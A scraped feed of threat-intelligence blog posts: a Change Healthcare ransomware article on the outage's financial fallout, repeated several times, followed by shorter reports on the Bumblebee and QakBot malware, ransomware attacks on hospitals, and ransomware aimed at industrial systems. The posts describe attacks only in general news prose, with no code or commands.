<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Don’t get stung by the Bumblebeehttps://redskyalliance.org/xindustry/don-t-get-stung-by-the-bumblebee2024-02-28T17:00:00.000Z2024-02-28T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12389946898,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12389946898,RESIZE_400x{{/staticFileLink}}" width="250" alt="12389946898?profile=RESIZE_400x" /></a>The infamous malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024. The enterprise security firm Proofpoint reported that the activity targets organizations in the US with voicemail-themed lures containing links to OneDrive URLs. "The URLs led to a Word file with names such as "ReleaseEvans#96.docm" (the digits before the file extension varied)," the company said in a recent report. "The Word document spoofed the consumer electronics company Humane." Opening the document leverages VBA macros to launch a PowerShell command to download and execute another PowerShell script from a remote server that, in turn, retrieves and runs the Bumblebee loader.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/new-all-in-one-evilextractor-stealer">https://redskyalliance.org/xindustry/new-all-in-one-evilextractor-stealer</a></p>
<p>Bumblebee, first reported in March 2022, is mainly designed to download and execute follow-on payloads such as ransomware. It has been put to use by multiple crimeware threat actors that were previously observed delivering BazaLoader (aka BazarLoader) and IcedID. It is also suspected to have been developed by threat actors the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.</p>
<p>The attack chain is notable for its reliance on macro-enabled documents in the attack chain, especially considering Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022, prompting threat actors to modify and diversify their approaches. The macro-based attack is also markedly different from pre-hiatus campaigns in which the phishing emails came with zipped LNK files bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to install the loader.</p>
<p>The return of Bumblebee also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files. The. MSI drops a Windows .cab (Cabinet) archive containing a DLL. The. MSI extracts the DLL from the .cab and executes it using shellcode. The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second instance's memory space.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/qakbot-malware-returns">https://redskyalliance.org/xindustry/qakbot-malware-returns</a></p>
<p>The latest QakBot artifacts have been found to harden the encryption used to conceal strings and other information, including employing a crypto-malware called DaveCrypter, making it more challenging to analyze. The new generation also reinstates the ability to detect whether the malware runs inside a virtual machine or sandbox.</p>
<p>Another crucial modification includes encrypting all communications between the malware and the command-and-control (C2) server using AES-256, a more robust method than was used in versions before the dismantling of QakBot's infrastructure in late August 2023. The takedown of the QakBot botnet infrastructure was a victory. Still, the bot's creators remain free, and someone with access to QakBot's source code has been experimenting with new builds and testing the waters with these latest variants. One of the most notable changes involves a change to the encryption algorithm the bot uses to conceal default configurations hardcoded into the bot, making it more difficult for analysts to see how the malware operates; the attackers are also restoring previously deprecated features, such as Virtual Machine (VM) awareness, and testing them out in these new versions.</p>
<p>QakBot has also emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.</p>
<p>The development comes as investigators reported a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk to resolve non-existent issues purportedly and ultimately allow threat actors to gain control of the machine.</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/02/bumblebee-malware-returns-with-new.html">https://thehackernews.com/2024/02/bumblebee-malware-returns-with-new.html</a></p></div>Cyber-Attacks on Hospitalshttps://redskyalliance.org/xindustry/cyber-attacks-on-hospitals2024-02-26T17:00:00.000Z2024-02-26T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12389945471,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12389945471,RESIZE_400x{{/staticFileLink}}" width="250" alt="12389945471?profile=RESIZE_400x" /></a>Cybersecurity experts are warning that hospitals around the country are at risk for attacks like the one that is crippling operations at a premier Midwestern children’s hospital and that the US government is doing too little to prevent such breaches. Hospitals in recent years have shifted their use of online technology to support everything from telehealth to medical devices to patient records. Today, they are a favorite target for internet thieves who hold systems’ data and networks hostage for hefty ransoms, said John Riggi, the American Hospital Association’s cybersecurity adviser. “Unfortunately, the unintended consequence of using all this network- and internet-connected technology is that it expanded our digital attack surface,” Riggi said. “So, many more opportunities for bad guys to penetrate our networks.”<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/hive-hospitals">https://redskyalliance.org/xindustry/hive-hospitals</a></p>
<p>The assailants often operate from American adversaries such as Russia, North Korea, and Iran, where they enjoy big payouts from their victims and face little prospect of ever being punished. In November 2023, a ransomware attack on a healthcare chain that operates 30 hospitals and 200 health facilities in the United States forced doctors to divert patients from emergency rooms and postpone elective surgeries. Meanwhile, a rural Illinois hospital announced it was permanently closed last year because it could not recover financially from a cyberattack. The hackers went as far as posting photos and patient information of breast cancer patients who were receiving treatment at a Pennsylvania health network after the system was hacked last year.</p>
<p>Recently, one of the top children’s hospitals in the country, the Ann & Robert H. Lurie Children’s Hospital of Chicago, has been forced to put its phone, email, and medical record systems offline as it battles a cyberattack. The FBI has said it is investigating. Brett Callow, an analyst for the cybersecurity firm Emsisoft, counted 46 cyberattacks on hospitals last year, compared with 25 in 2022. The paydays for criminals have gotten bigger, too, with the average payout jumping from $5,000 in 2018 to $1.5 million last year. “Unless governments do something more meaningful, more significant than they have done to date, it’ll inevitably get worse,” Callow said.</p>
<p>Callow believes the government should ban cyberattack victims such as hospitals, local governments and schools from paying ransoms. “There’s so much money being paid into the ransomware system now there’s no way the problem is going to go away on itself simply,” he said. The dramatic increase in these online raids has prompted the nation’s top health agency to develop new rules for hospitals to protect themselves from cyber threats.</p>
<p>The Department of Health and Human Services said it will rewrite the rules for the Health Insurance Portability and Accountability Act, the federal law commonly called HIPPA that requires insurers and health systems to protect patient information to include new provisions that address cybersecurity later this year. The department is also considering new cybersecurity requirements attached to hospitals’ Medicaid and Medicare funding.</p>
<p>Most hospitals will struggle to protect themselves. Experts are worried about rural hospitals, for example, that may have difficulty cobbling together money to update their cybersecurity properly. HHS wants more money from Congress to tackle the issue, but Palm said the agency doesn’t have a precise dollar amount it seeks. Becoming the victim of a cyberattack is costly, too. The attacks can put hospitals’ networks offline for weeks or months, forcing hospitals to turn away patients.</p>
<p>In Chicago, Lurie Hospital’s network has been offline for two weeks. The hospital, which served more than 260,000 patients last year, has established a separate call center for patients’ needs and resumed some care. </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<p> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/">https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/</a></p></div>IT / OT Issueshttps://redskyalliance.org/xindustry/it-ot-issues2024-02-13T17:05:00.000Z2024-02-13T17:05:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12377954654,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12377954654,RESIZE_400x{{/staticFileLink}}" width="250" alt="12377954654?profile=RESIZE_400x" /></a>The Colonial Pipeline ransomware infection has become a cautionary story about how ‘borking’ critical infrastructure can cause real-world pain, with fuel shortages leading to long lines and fistfights breaking out at gas stations. Or as Jen Easterly, boss of the US Cybersecurity and Infrastructure Security Agency, warned Congress recently, "Societal panic and chaos."</p>
<p>The CISA Director and other security and law enforcement chiefs stressed the reality in which nation-states operating against American infrastructure could cause physical havoc and destruction, particularly in the field of industrial operational technology systems.<a href="#_ftn1">[1]</a></p>
<p>The Colonial Pipeline ransomware attack targeted the oil distributor's backend IT systems. To date, such infections against fuel and internet providers, banks, hospitals and other critical sectors that keep life running have only targeted business networks. Some security analysts worry that ransomware designed to shut down operational technology systems and processes, such as those used in power plants, water treatment facilities, and manufacturing plants, is the next big thing. Fortunately, there's still plenty of money to be made from traditional ransomware infections, and infosec experts say this should keep the criminals busy, at least for the time being. "Dragos assesses with low confidence that ransomware groups may increasingly develop and deploy ransomware specifically designed to disrupt operational technology (OT) processes," the OT security shop warned in its most recent quarterly ransomware analysis. "Such disruptions would not only affect operational capabilities but also compromise safety, thereby increasing the urgency and potentially compelling victims to meet ransom demands more readily," the report noted. Dragos regularly responds to ransomware infections in industrial environments. And this assessment, albeit one with "low confidence," stems from criminals' increasingly vile extortion tactics designed to increase the pressure on victim organizations to pay ransom demands, according to a senior adversary hunter at Dragos. "Look at the methods of extortion, the way they create a significant impact on the victims," he said. "It's been increasing for the last two years, especially for industrial organizations." Plus, he added, as governments step up their efforts to dismantle ransomware gangs and prosecute their members, the criminal groups adopt new techniques to increase pressure on victims to pay up. "We have seen in the past groups that added to their arsenal the ability to kill OT processes," he emphasized.</p>
<p>The code he was referring to is EKANS, a ransomware variant with capabilities including forcibly stopping some industrial control system (ICS) operations. "While all indications at present show a relatively primitive attack mechanism on control system networks, the specificity of processes listed in a static 'kill list' shows a level of intentionality previously absent from ransomware targeting the industrial space," the security shop warned in 2020. Dragos explained that it hasn't yet been deployed in a cyber attack, but the capabilities for serious mischief do exist. "Extortion has gone beyond financial loss to safety," it warned. "We have seen ransomware groups announce their alignment with different regimes. Imagine what would happen if this was used as a weapon."</p>
<p>The threat isn't only coming from nation-state attackers, however. While a destructive attack from Russia or China that shut down the energy grid or water facilities would likely be considered an act of war, criminals gangs could give adversarial governments plausible deniability. Once financially motivated groups like Lockbit or BlackCat/ALPHV can buy these capabilities. </p>
<p>Dragos’ CEO expects to see OT-specific ransomware become much more commonplace. "Criminal actors no longer needed to develop their own capabilities, malicious software vulnerabilities, etc.," he explained. "They literally buy off-the shelf tools that are commonly used, and then just worry about operating them." </p>
